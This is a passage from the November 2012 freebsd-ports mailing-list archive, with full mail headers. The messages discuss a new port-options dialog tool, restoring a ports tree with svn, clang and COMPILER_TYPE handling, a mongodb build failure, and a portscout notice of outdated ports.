Mutt/1.5.21 (2010-09-15) Cc: freebsd-ports@freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 30 Nov 2012 08:17:22 -0000 --DocE+STaALJfprDB Content-Type: text/plain; charset=utf-8 Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Nov 29, 2012 at 05:12:55PM +0400, Ilya A. Arkhipov wrote: > Hi Folks, >=20 > Few week ago I started work on new dialog for ports, main idea it's addin= g functionality, I guess you know ;) > I took checklist.c from libdialog and modified it for us. Regarding licen= se, I discussed with Thomas E. Dickey(author dialog) he said I can't change= LGPL to BSD but it should not be a problem. > What we have now: > - check + radio lists in on box (and yes we can put off radiobox) > - separate line with text > - dynamic width/height size > - all features from checklist.c :) > -- mouse support > -- hotkey for find a lines > My plan: > - add Help button/F1/alt-h/esc-1 (actually don't know how will be better) > - button for license > - fixing bugs >_< > - start work on parsing receiving data, after that should be ready for te= sting. >=20 > Regarding parsing data I want discuss here. Wanna correct understand what= will be better, now I have few variants: > 1. Get all data from env. variables > 2. Use the same with old dialog style, I mean receive from STDIN > 3. From file? <- guess bad idea > Your ideas? >=20 > And certainly screeshots: > Big description(just for test); > In X -- http://imm.io/NkVR > In Terminal -- https://www.dropbox.com/s/bzt8zszpk40jrso/2012-11-29%201= 4.59.53.jpg > With license button: > in X -- http://imm.io/Nl9K >=20 > You can find my repo there: https://bitbucket.org/m1cro/d4p/. I'll be hap= py for all response ;) >=20 That look very good! :) --DocE+STaALJfprDB Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.19 (FreeBSD) iEYEARECAAYFAlC4a48ACgkQKc512sD3afgsrQCdGIfztbo/WC8rKEwqmanNr5GX OBcAoLNvVqFWnefqB8Bk2EyyeQB7nNLj =lJmF -----END PGP SIGNATURE----- --DocE+STaALJfprDB-- From owner-freebsd-ports@FreeBSD.ORG Fri Nov 30 09:35:51 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id E61BFA5C for ; Fri, 30 Nov 2012 09:35:51 +0000 (UTC) (envelope-from ronald-freebsd8@klop.yi.org) Received: from cpsmtpb-ews10.kpnxchange.com (cpsmtpb-ews10.kpnxchange.com [213.75.39.15]) by mx1.freebsd.org (Postfix) with ESMTP id 465598FC12 for ; Fri, 30 Nov 2012 09:35:50 +0000 (UTC) Received: from cpsps-ews11.kpnxchange.com ([10.94.84.178]) by cpsmtpb-ews10.kpnxchange.com with Microsoft SMTPSVC(7.5.7601.17514); Fri, 30 Nov 2012 10:35:00 +0100 Received: from CPSMTPM-TLF103.kpnxchange.com ([195.121.3.6]) by cpsps-ews11.kpnxchange.com with Microsoft SMTPSVC(7.5.7601.17514); Fri, 30 Nov 2012 10:35:00 +0100 Received: from sjakie.klop.ws ([212.182.167.131]) by CPSMTPM-TLF103.kpnxchange.com with Microsoft SMTPSVC(7.5.7601.17514); Fri, 30 Nov 2012 10:35:43 +0100 Received: from 212-182-167-131.ip.telfort.nl (localhost [127.0.0.1]) by sjakie.klop.ws (Postfix) with ESMTP id 68CAF47EC for ; Fri, 30 Nov 2012 10:35:43 +0100 (CET) Content-Type: text/plain; charset=utf-8; format=flowed; delsp=yes To: freebsd-ports@freebsd.org Subject: Re: /archivers/ is missing after svn... References: <1354215848.37744.YahooMailClassic@web164006.mail.gq1.yahoo.com> Date: Fri, 30 Nov 2012 10:35:42 +0100 MIME-Version: 1.0 Content-Transfer-Encoding: 8bit From: "Ronald Klop" Message-ID: In-Reply-To: <1354215848.37744.YahooMailClassic@web164006.mail.gq1.yahoo.com> User-Agent: Opera Mail/12.11 (FreeBSD) X-OriginalArrivalTime: 30 Nov 2012 09:35:43.0951 (UTC) FILETIME=[11C09DF0:01CDCEDE] X-RcptDomain: freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 30 Nov 2012 09:35:52 -0000 On Thu, 29 Nov 2012 20:04:08 +0100, Jeffrey Bouquet wrote: > > > --- On Thu, 11/29/12, Warren Block wrote: > > From: Warren Block > Subject: Re: /archivers/ is missing after svn... > To: "Jeffrey Bouquet" > Cc: freebsd-ports@freebsd.org > Date: Thursday, November 29, 2012, 7:00 AM > > On Thu, 29 Nov 2012, Jeffrey Bouquet wrote: > >> UPDATE: >> >> OTOH I can svn it independently to elsewhere than ports, any canonical >> way >> to move that /tmp/archivers to /usr/ports/archivers ? >> >> DONE: >> moved that /tmp/archivers to /usr/ports/archivers, strangely I did not >> find its >> .svn after the move. > > Multiple partial checkouts is not the same as one big checkout. The > .svn directory only exists in the base directory of the checkout. > > Back up /usr/ports (for local changes), delete the entire directory, > then check out the entire directory. > _______________________________________________ > Done. > Unfortunately I forgot to relocate /packages/ and /distfiles/ first, so > they have been restored from yesterday's backup. > Also there is an INDEX-9.move_distfiles (zero length file) for the next > time, as a reminder, as I'd move INDEX* out of the way first. > _______________________________________________ > freebsd-ports@freebsd.org mailing list > http://lists.freebsd.org/mailman/listinfo/freebsd-ports > To unsubscribe, send any mail to "freebsd-ports-unsubscribe@freebsd.org" > Packages and distfiles are cache directories to save on network bandwidth. If your internet is not very slow or on a data limit then it is harmless to delete their content. The files will get downloaded when they are needed again. You sound to me like you moved the content of /usr/ports to another place per file or per directory. I hope you did something like this. mv /usr/ports /usr/ports-old svn checkout svn+ssh://svn.freebsd.org/ports/head /usr/ports This will restore a complete and consistent ports directory. And you don't need the reminders, etc. Regards, Ronald. From owner-freebsd-ports@FreeBSD.ORG Fri Nov 30 11:59:36 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 735CA4E6 for ; Fri, 30 Nov 2012 11:59:36 +0000 (UTC) (envelope-from jakub_lach@mailplus.pl) Received: from sam.nabble.com (sam.nabble.com [216.139.236.26]) by mx1.freebsd.org (Postfix) with ESMTP id 4D4E78FC12 for ; Fri, 30 Nov 2012 11:59:36 +0000 (UTC) Received: from [192.168.236.26] (helo=sam.nabble.com) by sam.nabble.com with esmtp (Exim 4.72) (envelope-from ) id 1TePFn-0001P3-La for freebsd-ports@freebsd.org; Fri, 30 Nov 2012 03:59:35 -0800 Date: Fri, 30 Nov 2012 03:59:35 -0800 (PST) From: Jakub Lach To: freebsd-ports@freebsd.org Message-ID: <1354276775645-5765507.post@n5.nabble.com> In-Reply-To: References: Subject: Re: editors/libreoffice pkg_add error MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 30 Nov 2012 11:59:36 -0000 Broken archive? -- View this message in context: http://freebsd.1045724.n5.nabble.com/editors-libreoffice-pkg-add-error-tp5765455p5765507.html Sent from the freebsd-ports mailing list archive at Nabble.com. From owner-freebsd-ports@FreeBSD.ORG Fri Nov 30 12:08:19 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 9A2019CF for ; Fri, 30 Nov 2012 12:08:19 +0000 (UTC) (envelope-from jakub_lach@mailplus.pl) Received: from sam.nabble.com (sam.nabble.com [216.139.236.26]) by mx1.freebsd.org (Postfix) with ESMTP id 766678FC1C for ; Fri, 30 Nov 2012 12:08:19 +0000 (UTC) Received: from [192.168.236.26] (helo=sam.nabble.com) by sam.nabble.com with esmtp (Exim 4.72) (envelope-from ) id 1TePOF-00027a-0I for freebsd-ports@freebsd.org; Fri, 30 Nov 2012 04:08:19 -0800 Date: Fri, 30 Nov 2012 04:08:18 -0800 (PST) From: Jakub Lach To: freebsd-ports@freebsd.org Message-ID: <1354277298990-5765510.post@n5.nabble.com> In-Reply-To: References: Subject: Re: Chromium ISSUE with GCC 4.8 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 30 Nov 2012 12:08:19 -0000 You are forcing developer version of compiler, it's not even released yet. 4.7.2 was released 2 months ago. If you care enough, bug gcc as already you should know "Please submit a full bug report, with preprocessed source if appropriate. See for instructions." -- View this message in context: http://freebsd.1045724.n5.nabble.com/Chromium-ISSUE-with-GCC-4-8-tp5765309p5765510.html Sent from the freebsd-ports mailing list archive at Nabble.com. From owner-freebsd-ports@FreeBSD.ORG Fri Nov 30 13:26:37 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id E4E56D5A; Fri, 30 Nov 2012 13:26:37 +0000 (UTC) (envelope-from lifanov@mail.lifanov.com) Received: from mail.lifanov.com (mail.lifanov.com [206.125.175.12]) by mx1.freebsd.org (Postfix) with ESMTP id C1E7C8FC13; Fri, 30 Nov 2012 13:26:37 +0000 (UTC) Received: from [10.1.6.160] (cnet520-windstream.mcclatchyinteractive.com [166.108.16.2]) (using TLSv1 with cipher DHE-RSA-CAMELLIA256-SHA (256/256 bits)) (No client certificate requested) by mail.lifanov.com (Postfix) with ESMTPSA id 6D75A19E752; Fri, 30 Nov 2012 13:26:36 +0000 (UTC) Message-ID: <50B8B40A.8010000@mail.lifanov.com> Date: Fri, 30 Nov 2012 08:26:34 -0500 From: Nikolai Lifanov User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:17.0) Gecko/17.0 Thunderbird/17.0 MIME-Version: 1.0 To: Yamaya Takashi Subject: Re: How to handle WITH_CLANG_IS_CC in ports References: <20121125114918.GA35966@oshi.local> <20121127162737.GB1790@oshi.local> <50B7916E.4070102@mail.lifanov.com> <50B7A0A3.8030604@kbh.biglobe.ne.jp> <20121129194701.GA3017@oshi.local> <50B7D3F7.4020201@FreeBSD.org> <50B7E5CC.70203@kbh.biglobe.ne.jp> In-Reply-To: <50B7E5CC.70203@kbh.biglobe.ne.jp> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Cc: Tobias Rehbein , Dimitry Andric , freebsd-ports@freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 30 Nov 2012 13:26:38 -0000 On 11/29/2012 05:46 PM, Yamaya Takashi wrote: > On 2012/11/30 06:30, Dimitry Andric wrote: >> On 2012-11-29 20:47, Tobias Rehbein wrote:> Am Fri, Nov 30, 2012 at >> 02:51:31AM +0900 schrieb Yamaya Takashi: >>>> >>>> Include Mk/bsd.compiler.mk, and >>>> .if ${COMPILER_TYPE} == "clang" >>>> clang specific code >>>> .endif >>>> >>> >>> Thanks. This is exactly what I was looking for. It is available in >>> CURRENT only though. >> >> FYI, I merged bsd.compiler.mk and the rest of the COMPILER_TYPE logic to >> stable/9 in r243041. It will not be in 9.1-RELEASE, though... >> > I am NOT committer. > Please commit Mk/bsd.compiler.mk. > > [usr/ports/]Mk/bsd.compiler.mk is differ from > [usr/src/]share/mk/bsd.compiler.mk. > Ports version accepts another compiler, e.g. CC=icc, but Base version not. > > > Should it be sufficient to use logic like COMPILER_TYPE in combination with OSVERSION? From owner-freebsd-ports@FreeBSD.ORG Fri Nov 30 14:17:52 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id BDD88B63; Fri, 30 Nov 2012 14:17:52 +0000 (UTC) (envelope-from yamayan@kbh.biglobe.ne.jp) Received: from rcpt-expgw.biglobe.ne.jp (rcpt-expgw.biglobe.ne.jp [IPv6:2001:260:401:16::2]) by mx1.freebsd.org (Postfix) with ESMTP id 244BF8FC0C; Fri, 30 Nov 2012 14:17:51 +0000 (UTC) Received: from vc-gw.biglobe.ne.jp by rcpt-expgw.biglobe.ne.jp (shby/5910021009) with SMTP id qAUEHmGd028850; Fri, 30 Nov 2012 23:17:48 +0900 Received: from smtp-gw.biglobe.ne.jp ([172.21.175.155]) by vc-gw.biglobe.ne.jp (kbkr/0716090908) with ESMTP id qAUEHmgP020307; Fri, 30 Nov 2012 23:17:48 +0900 X-Biglobe-Sender: Received: from [192.168.0.100] (KD027083060020.ppp-bb.dion.ne.jp [27.83.60.20]) by smtp-gw.biglobe.ne.jp id XADNAC15AFDB; Fri, 30 Nov 2012 23:17:48 +0900 (JST) Message-ID: <50B8C019.9060101@kbh.biglobe.ne.jp> Date: Fri, 30 Nov 2012 23:18:01 +0900 From: Yamaya Takashi User-Agent: Mozilla/5.0 (X11; FreeBSD amd64; rv:17.0) Gecko/17.0 Thunderbird/17.0 MIME-Version: 1.0 To: Nikolai Lifanov Subject: Re: How to handle WITH_CLANG_IS_CC in ports References: <20121125114918.GA35966@oshi.local> <20121127162737.GB1790@oshi.local> <50B7916E.4070102@mail.lifanov.com> <50B7A0A3.8030604@kbh.biglobe.ne.jp> <20121129194701.GA3017@oshi.local> <50B7D3F7.4020201@FreeBSD.org> <50B7E5CC.70203@kbh.biglobe.ne.jp> <50B8B40A.8010000@mail.lifanov.com> In-Reply-To: <50B8B40A.8010000@mail.lifanov.com> Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Cc: Tobias Rehbein , Dimitry Andric , freebsd-ports@freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 30 Nov 2012 14:17:52 -0000 On 2012/11/30 22:26, Nikolai Lifanov wrote: > On 11/29/2012 05:46 PM, Yamaya Takashi wrote: >> On 2012/11/30 06:30, Dimitry Andric wrote: >>> On 2012-11-29 20:47, Tobias Rehbein wrote:> Am Fri, Nov 30, 2012 at >>> 02:51:31AM +0900 schrieb Yamaya Takashi: >>>>> >>>>> Include Mk/bsd.compiler.mk, and >>>>> .if ${COMPILER_TYPE} == "clang" >>>>> clang specific code >>>>> .endif >>>>> >>>> >>>> Thanks. This is exactly what I was looking for. It is available in >>>> CURRENT only though. >>> >>> FYI, I merged bsd.compiler.mk and the rest of the COMPILER_TYPE >>> logic to >>> stable/9 in r243041. It will not be in 9.1-RELEASE, though... >>> >> I am NOT committer. >> Please commit Mk/bsd.compiler.mk. >> >> [usr/ports/]Mk/bsd.compiler.mk is differ from >> [usr/src/]share/mk/bsd.compiler.mk. >> Ports version accepts another compiler, e.g. CC=icc, but Base version >> not. >> >> >> > > Should it be sufficient to use logic like COMPILER_TYPE in combination > with OSVERSION? > > > No. .include "${PORTSDIR}/Mk/bsd.compiler.mk" #Now, COMPILER_TYPE is defined. From owner-freebsd-ports@FreeBSD.ORG Fri Nov 30 14:22:35 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id AB2EED39 for ; Fri, 30 Nov 2012 14:22:35 +0000 (UTC) (envelope-from gibblertron@gmail.com) Received: from mail-ie0-f182.google.com (mail-ie0-f182.google.com [209.85.223.182]) by mx1.freebsd.org (Postfix) with ESMTP id 6EABC8FC0C for ; Fri, 30 Nov 2012 14:22:35 +0000 (UTC) Received: by mail-ie0-f182.google.com with SMTP id s9so906232iec.13 for ; Fri, 30 Nov 2012 06:22:28 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:date:message-id:subject:from:to:content-type; bh=8RB26xAio0RhB96dG2X7BC1mYABEWWXwBhB8iz5jTnk=; b=fwdPE1DAiW2oJ8FPIFDH/VpfctVavsVZ1ooJrj0WaqEuRcR6DCwrlXjmWAfOo0pWIG MhP+6Ug22DziWTkvPVXsZmTTBjysD75TSD76XDDV6XPtHMcR/R9JcxjJ0bJYEztiCZiv 4LCEEU+C7/fZYkMix8woUn+VIIZ7Er7ndDHAh6puqQJpjTW0UGjg7kTmPFAa+7gQP7E8 aFsGjpqjRSuk3fgCdfgAmiSuy5dDzuIjT9B/adhIlHywwdo1K42e7d1o4ucr7T+us9AC NCy22D+/nk3IfqUg47/K2CNpnes+OiZH0gf/NzD4YOozI35XiTt3bAVeMBM4MPNHz2Jw MAwQ== MIME-Version: 1.0 Received: by 10.50.5.177 with SMTP id t17mr1117623igt.48.1354285348770; Fri, 30 Nov 2012 06:22:28 -0800 (PST) Received: by 10.42.132.67 with HTTP; Fri, 30 Nov 2012 06:22:28 -0800 (PST) Date: Fri, 30 Nov 2012 06:22:28 -0800 Message-ID: Subject: databases/mongodb on FreeBSD 9 From: Patrick To: freebsd-ports@freebsd.org Content-Type: text/plain; charset=ISO-8859-1 X-Content-Filtered-By: Mailman/MimeDel 2.1.14 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 30 Nov 2012 14:22:35 -0000 Has anyone had any issues building the mongodb port on FreeBSD 9? I'm running 9.0-RELEASE-p5 on i386: It's bailing for me here: c++ -o build/freebsd/cpppath_cpp/cxx_c++/ssl/use-system-all/usesm/mongo/shell/linenoise.o -c -Wnon-virtual-dtor -Woverloaded-virtual -fno-omit-frame-pointer -fPIC -fno-strict-aliasing -ggdb -pthread -Wall -Wsign-compare -Wno-unknown-pragmas -Winvalid-pch -O3 -D_SCONS -DMONGO_EXPOSE_MACROS -DSUPPORT_UTF8 -D__freebsd__ -D_FILE_OFFSET_BITS=64 -DJS_C_STRINGS_ARE_UTF8 -DMONGO_SSL -DMONGO_HAVE_HEADER_UNISTD_H -DMONGO_HAVE_EXECINFO_BACKTRACE -Ibuild/freebsd/cpppath_cpp/cxx_c++/ssl/use-system-all/usesm -Isrc -Ibuild/freebsd/cpppath_cpp/cxx_c++/ssl/use-system-all/usesm/mongo -Isrc/mongo -Ibuild/freebsd/cpppath_cpp/cxx_c++/ssl/use-system-all/usesm/mongo/cpp -Isrc/mongo/cpp -I/usr/local/include src/mongo/shell/linenoise.cpp In file included from src/mongo/shell/linenoise.cpp:115: src/mongo/shell/linenoise_utf8.h: In member function 'void linenoise_utf8::UtfStringMixin::swap(linenoise_utf8::UtfStringMixin&)': src/mongo/shell/linenoise_utf8.h:145: error: 'swap' is not a member of 'std' src/mongo/shell/linenoise_utf8.h:146: error: 'swap' is not a member of 'std' src/mongo/shell/linenoise_utf8.h:147: error: 'swap' is not a member of 'std' scons: *** [build/freebsd/cpppath_cpp/cxx_c++/ssl/use-system-all/usesm/mongo/shell/linenoise.o] Error 1 scons: building terminated because of errors. *** Error code 2 Stop in /usr/ports/databases/mongodb. *** Error code 1 Stop in /usr/ports/databases/mongodb. This is with the default options. Using V8 as the Javascript engine has the same results... From owner-freebsd-ports@FreeBSD.ORG Fri Nov 30 15:02:43 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id D857C6EF for ; Fri, 30 Nov 2012 15:02:43 +0000 (UTC) (envelope-from mueller23@insightbb.com) Received: from mail.insightbb.com (smtp2.insight.synacor.com [208.47.185.24]) by mx1.freebsd.org (Postfix) with ESMTP id 79ACC8FC08 for ; Fri, 30 Nov 2012 15:02:42 +0000 (UTC) X_CMAE_Category: 0,0 Undefined,Undefined X-CNFS-Analysis: v=2.0 cv=O+27TWBW c=1 sm=0 a=Dm9TOXL4taQ+Gy1KovpL+A==:17 a=SClqGrqbWQsA:10 a=jLN7EqiLvroA:10 a=9YQ-1ebCAAAA:8 a=3HRt-vh9VCUA:10 a=zWGVsrqIAAAA:8 a=VAMm1qzQAAAA:8 a=xtERp6CFAAAA:8 a=WbrW8kZnUa97Qlp0VPcA:9 a=dRwE02sqAs4A:10 a=iDq_lVCWZgkA:10 a=Dm9TOXL4taQ+Gy1KovpL+A==:117 X-CM-Score: 0 X-Scanned-by: Cloudmark Authority Engine Authentication-Results: smtp02.insight.synacor.com smtp.mail=mueller23@insightbb.com; spf=softfail; sender-id=softfail Authentication-Results: smtp02.insight.synacor.com header.from=mueller23@insightbb.com; sender-id=softfail Received-SPF: softfail (smtp02.insight.synacor.com: transitional domain insightbb.com does not designate 74.130.198.7 as permitted sender) Received: from [74.130.198.7] ([74.130.198.7:59632] helo=localhost) by mail.insightbb.com (envelope-from ) (ecelerity 2.2.3.49 r(42060/42061)) with ESMTP id 16/90-25607-19AC8B05; Fri, 30 Nov 2012 10:02:42 -0500 Date: Fri, 30 Nov 2012 10:02:41 -0500 Message-ID: <16.90.25607.19AC8B05@smtp02.insight.synacor.com> From: "Thomas Mueller" To: freebsd-ports@freebsd.org Subject: Re: ports/173258: graphics/gnash port has dependency problem with libxul19 Cc: "Ilya A. Arkhipov" X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 30 Nov 2012 15:02:44 -0000 > Hi Folks, > Few week ago I started work on new dialog for ports, main idea it's adding functionality, I guess you know ;) > I took checklist.c from libdialog and modified it for us. Regarding license, I discussed with Thomas E. Dickey(author dialog) he said I can't change LGPL to > +BSD but it should not be a problem. > What we have now: > - check + radio lists in on box (and yes we can put off radiobox) > - separate line with text > - dynamic width/height size > - all features from checklist.c :) > -- mouse support > -- hotkey for find a lines > My plan: > - add Help button/F1/alt-h/esc-1 (actually don't know how will be better) > - button for license > - fixing bugs >_< > - start work on parsing receiving data, after that should be ready for testing. > Regarding parsing data I want discuss here. Wanna correct understand what will be better, now I have few variants: > 1. Get all data from env. variables > 2. Use the same with old dialog style, I mean receive from STDIN > 3. From file? <- guess bad idea > Your ideas? > And certainly screeshots: > Big description(just for test); > In X -- http://imm.io/NkVR > In Terminal -- https://www.dropbox.com/s/bzt8zszpk40jrso/2012-11-29%2014.59.53.jpg > With license button: > in X -- http://imm.io/Nl9K > You can find my repo there: https://bitbucket.org/m1cro/d4p/. I'll be happy for all response ;) > With Best Regards, > Ilya A. Arkhipov I'd like a dialog, if there is to be a dialog rather than setting options in /etc/make.conf, that would not mess up when the user keeps a log of a build using tee or script. One possibility would be to do the dialog in a virtual terminal separate from the ports build. Configuration dialog has to work from nongraphical interface, since FreeBSD base system, where a user would start, has no graphical interface. I like the idea of putting port options in a file, as NetBSD pkgsrc does using /etc/mk.conf, or possibly /usr/pkg/etc/mk.conf when on a non-NetBSD platform. Tom From owner-freebsd-ports@FreeBSD.ORG Fri Nov 30 15:36:37 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 48AD931B for ; Fri, 30 Nov 2012 15:36:37 +0000 (UTC) (envelope-from prvs=6745961d0=pschmehl_lists@tx.rr.com) Received: from ip-002.utdallas.edu (ip-002.utdallas.edu [129.110.20.108]) by mx1.freebsd.org (Postfix) with ESMTP id 164EA8FC0C for ; Fri, 30 Nov 2012 15:36:36 +0000 (UTC) X-Group: None X-IronPort-Anti-Spam-Filtered: true X-IronPort-Anti-Spam-Result: AgYIACbRuFCBbgogOmdsb2JhbABEhWa6PQMBAQEBGQhLgl0CgWMaiCOeNoZVmnaQIGEDiF2geA X-IronPort-AV: E=Sophos;i="4.84,191,1355119200"; d="scan'208";a="104771949" Received: from zxtm01.utdallas.edu (HELO utd71538.utdallas.edu) ([129.110.10.32]) by ip-002.utdallas.edu with ESMTP/TLS/DHE-RSA-AES256-SHA; 30 Nov 2012 09:36:35 -0600 Date: Fri, 30 Nov 2012 09:36:32 -0600 From: Paul Schmehl To: FreeBSD Ports List Subject: Dealing with options in dependent ports Message-ID: X-Mailer: Mulberry/4.1.0a1 (Mac OS X) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline; size=951 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list Reply-To: Paul Schmehl List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 30 Nov 2012 15:36:37 -0000 I'm working on a port that has an option for a build_depends on another port. If that option is selected, the dependent port MUST be built with an option that is not selected by default. Is there a way to either force that option to be selected in the dependent port? Or, failing that, is it possible to pop up a message warning the installer that they must select that option before building the dependent port or, if they've already installed it without the option, they must deinstall and reinstall after selecting that option? -- Paul Schmehl, Senior Infosec Analyst As if it wasn't already obvious, my opinions are my own and not those of my employer. ******************************************* "It is as useless to argue with those who have renounced the use of reason as to administer medication to the dead." Thomas Jefferson "There are some ideas so wrong that only a very intelligent person could believe in them." George Orwell From owner-freebsd-ports@FreeBSD.ORG Fri Nov 30 15:43:28 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id E9E90529 for ; Fri, 30 Nov 2012 15:43:28 +0000 (UTC) (envelope-from portscout@portscout.freebsd.org) Received: from null.zi0r.com (null.zi0r.com [71.245.171.204]) by mx1.freebsd.org (Postfix) with ESMTP id 8AA0C8FC16 for ; Fri, 30 Nov 2012 15:43:28 +0000 (UTC) Received: from null.zi0r.com (localhost [127.0.0.1]) by null.zi0r.com (8.14.5/8.14.5) with ESMTP id qAUFhRBj026507 for ; Fri, 30 Nov 2012 10:43:28 -0500 (EST) (envelope-from portscout@portscout.freebsd.org) Received: (from portscout@localhost) by null.zi0r.com (8.14.5/8.14.5/Submit) id qAUFhRxL026299; Fri, 30 Nov 2012 10:43:27 -0500 (EST) (envelope-from portscout) Message-Id: <201211301543.qAUFhRxL026299@null.zi0r.com> MIME-Version: 1.0 Content-Disposition: inline Content-Transfer-Encoding: 8bit Content-Type: text/plain Date: Fri, 30 Nov 2012 10:43:27 -0500 From: portscout@portscout.freebsd.org To: ports@freebsd.org Subject: FreeBSD ports you maintain which are out of date X-Mailer: portscout/0.8.1 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 30 Nov 2012 15:43:29 -0000 Dear port maintainer, The portscout new distfile checker has detected that one or more of your ports appears to be out of date. Please take the opportunity to check each of the ports listed below, and if possible and appropriate, submit/commit an update. If any ports have already been updated, you can safely ignore the entry. You will not be e-mailed again for any of the port/version combinations below. Full details can be found at the following URL: http://portscout.freebsd.org/ports@freebsd.org.html Port | Current version | New version ------------------------------------------------+-----------------+------------ devel/arm-rtems-gdb | 7.2 | 7.5.1 ------------------------------------------------+-----------------+------------ devel/cross-gdb | 7.2 | 7.5.1 ------------------------------------------------+-----------------+------------ devel/i386-rtems-gdb | 7.2 | 7.5.1 ------------------------------------------------+-----------------+------------ devel/k8048 | 1.04 | 2.00 ------------------------------------------------+-----------------+------------ devel/m68k-rtems-gdb | 7.2 | 7.5.1 ------------------------------------------------+-----------------+------------ devel/mips-rtems-gdb | 7.2 | 7.5.1 ------------------------------------------------+-----------------+------------ devel/powerpc-rtems-gdb | 7.2 | 7.5.1 ------------------------------------------------+-----------------+------------ devel/sh-rtems-gdb | 7.2 | 7.5.1 ------------------------------------------------+-----------------+------------ devel/sparc-rtems-gdb | 7.2 | 7.5.1 ------------------------------------------------+-----------------+------------ www/xist | 3.25 | 4.5 ------------------------------------------------+-----------------+------------ If any of the above results are invalid, please check the following page for details on how to improve portscout's detection and selection of distfiles on a per-port basis: http://portscout.freebsd.org/info/portscout-portconfig.txt If wish to stop receiving portscout reminders, please contact portscout@portscout.freebsd.org Thanks. From owner-freebsd-ports@FreeBSD.ORG Fri Nov 30 15:47:55 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id CF84B62F for ; Fri, 30 Nov 2012 15:47:55 +0000 (UTC) (envelope-from thierry@pompo.net) Received: from mx1a.lautre.net (eyra.lautre.net [80.67.160.71]) by mx1.freebsd.org (Postfix) with ESMTP id 891668FC15 for ; Fri, 30 Nov 2012 15:47:55 +0000 (UTC) Received: from graf.pompo.net (graf.pompo.net [78.225.128.39]) (using TLSv1 with cipher ADH-AES256-SHA (256/256 bits)) (No client certificate requested) (Authenticated sender: thierry@pompo.net) by mx1a.lautre.net (Postfix) with ESMTPSA id 82E0740B7C for ; Fri, 30 Nov 2012 16:47:48 +0100 (CET) Received: by graf.pompo.net (Postfix, from userid 1001) id 443C5114AD; Fri, 30 Nov 2012 16:47:40 +0100 (CET) Date: Fri, 30 Nov 2012 16:47:40 +0100 